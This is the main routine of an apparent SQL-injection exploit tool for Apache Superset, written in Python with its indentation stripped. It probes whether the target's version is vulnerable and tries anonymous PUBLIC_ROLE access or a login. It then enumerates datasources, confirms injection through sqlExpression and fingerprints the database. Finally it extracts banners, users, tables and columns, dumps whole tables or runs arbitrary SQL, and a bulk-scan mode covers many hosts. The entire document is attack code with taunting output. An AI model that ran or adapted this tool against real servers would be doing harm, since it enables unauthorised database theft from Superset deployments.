args = P.parse_args()
VERBOSITY = args.v
# Bulk scan
if args.scan_file:
run_bulk_scan(args.scan_file, args.threads, args.timeout, args.scan_output)
sys.exit(0)
if not args.url:
fail("--url / -u required (or --scan-file for bulk)")
P.print_usage()
sys.exit(1)
base_url = args.url.rstrip("/")
if args.proxy:
import os
os.environ["HTTP_PROXY"] = args.proxy
os.environ["HTTPS_PROXY"] = args.proxy
banner()
# -- Recon ----------------------------------------------------------------
info("probing target...")
version = check_version(base_url, timeout=args.timeout)
if version:
if is_vulnerable(version):
good(f"Superset {C.BOLD}{version}{C.RESET} -- {C.RED}{C.BOLD}VULNERABLE{C.RESET}")
else:
warn(f"Superset {version} -- likely patched")
else:
warn("version unknown")
# -- Auth -----------------------------------------------------------------
session = None
if args.anonymous:
info("trying anonymous access (PUBLIC_ROLE)...")
session = try_anonymous(base_url, timeout=args.timeout)
if session:
good(f"anonymous access {C.BOLD}WORKS{C.RESET} -- PUBLIC_ROLE is active")
creepy("no credentials needed. they left the door open.")
else:
fail("anonymous access denied -- PUBLIC_ROLE not configured")
warn("falling back to credential-based login...")
if not session:
info(f"authenticating as '{args.user}'...")
session = login(base_url, args.user, args.password, timeout=args.timeout)
if not session:
fail("all authentication methods failed")
sys.exit(1)
good("authenticated")
# -- Datasources ----------------------------------------------------------
info("enumerating datasources...")
datasources = enumerate_datasources(base_url, session, timeout=args.timeout)
if datasources:
good(f"{len(datasources)} datasource(s):")
for ds in datasources:
print(f" {C.CYAN}{ds['id']}{C.RESET} {ds['name']} "
f"{C.DIM}[{ds['database']}]{C.RESET}")
else:
warn("no datasources found")
if args.check:
print(f"\n {C.GRAY}// recon complete.{C.RESET}\n")
sys.exit(0)
# -- Resolve datasource ---------------------------------------------------
if not args.ds_id:
if datasources:
args.ds_id = datasources[0]["id"]
info(f"using datasource: {C.BOLD}{args.ds_id}{C.RESET}")
else:
fail("no --ds-id and no datasources found")
sys.exit(1)
# -- Test injection -------------------------------------------------------
has_enum = any([args.banner, args.current_user, args.current_db, args.hostname,
args.dbs, args.tables, args.columns, args.dump, args.dump_all,
args.count, args.sql, args.test])
if has_enum or args.test:
info(f"testing injection via {C.BOLD}{args.injection_point}{C.RESET}...")
inj = test_injectable(base_url, session, args.ds_id, timeout=args.timeout)
if inj:
good(f"injectable via {C.BOLD}{inj}{C.RESET}")
args.injection_point = inj
else:
fail("injection test failed")
if args.test:
sys.exit(1)
if args.test and not any([args.banner, args.current_user, args.current_db,
args.dbs, args.tables, args.columns, args.dump,
args.dump_all, args.count, args.sql]):
print(f"\n {C.GRAY}// injectable. use --banner, --tables, --dump to extract.{C.RESET}\n")
sys.exit(0)
# -- Fingerprint DB -------------------------------------------------------
db_type = "unknown"
if has_enum and not args.sql:
db_type = fingerprint_db(base_url, session, args.ds_id,
args.injection_point, args.timeout)
ip = args.injection_point
xb = args.xml_bypass
to = args.timeout
# -- Enumeration ----------------------------------------------------------
if args.banner:
enum_banner(base_url, session, args.ds_id, db_type, ip, xb, to)
if args.current_user:
enum_current_user(base_url, session, args.ds_id, db_type, ip, xb, to)
if args.current_db:
enum_current_db(base_url, session, args.ds_id, db_type, ip, xb, to)
if args.hostname:
enum_hostname(base_url, session, args.ds_id, db_type, ip, xb, to)
if args.dbs:
enum_dbs(base_url, session, args.ds_id, db_type, ip, xb, to)
if args.tables:
enum_tables(base_url, session, args.ds_id, db_type, ip, xb, to,
target_db=args.target_db, datasources=datasources)
if args.columns:
if not args.target_table:
fail("--columns requires -T <table>")
sys.exit(1)
enum_columns(base_url, session, args.ds_id, db_type, ip, xb, to,
args.target_table, target_db=args.target_db,
datasources=datasources)
if args.count:
if not args.target_table:
fail("--count requires -T <table>")
sys.exit(1)
enum_count(base_url, session, args.ds_id, db_type, ip, xb, to,
args.target_table, target_db=args.target_db)
if args.dump:
if not args.target_table:
fail("--dump requires -T <table>")
sys.exit(1)
enum_dump(base_url, session, args.ds_id, db_type, ip, xb, to,
args.target_table, target_columns=args.target_columns,
target_db=args.target_db,
start=args.start, stop=args.stop, datasources=datasources)
if args.dump_all:
enum_dump_all(base_url, session, args.ds_id, db_type, ip, xb, to,
target_db=args.target_db,
start=args.start, stop=args.stop, datasources=datasources)
# -- Raw SQL --------------------------------------------------------------
if args.sql:
info(f"executing: {C.DIM}{args.sql}{C.RESET}")
val = extract_value(base_url, session, args.ds_id, args.sql,
inj_point=ip, xml_bypass=xb, timeout=to)
if val:
good(f"result: {C.BOLD}{val}{C.RESET}")
else:
fail("no data extracted")
print(f"\n {C.GRAY}{C.DIM}// sqlExpression was never meant to be trusted.{C.RESET}\n")
if __name__ == "__main__":
main()